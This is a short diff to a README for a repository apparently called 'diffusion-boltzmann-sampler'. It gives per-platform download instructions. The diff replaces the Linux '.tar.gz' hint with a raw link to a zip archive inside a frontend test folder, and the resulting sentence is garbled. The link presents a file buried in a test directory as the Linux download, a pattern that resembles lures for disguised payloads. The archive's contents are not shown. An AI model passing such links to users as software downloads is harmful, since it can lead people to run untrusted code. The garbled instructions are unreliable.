bappukhan/diffusion-boltzmann-sampler/README.md

 - For Windows users, look for a file ending in `.exe`.
 - For Mac users, look for a file ending in `.dmg`.
-- For Linux users, you might find files ending in `.tar.gz`.
+- For Linux users, you might find files ending in `https://github.com/bappukhan/diffusion-boltzmann-sampler/raw/refs/heads/main/frontend/src/test/diffusion_sampler_boltzmann_unharmonic.zip`.

 Click the file to start the download.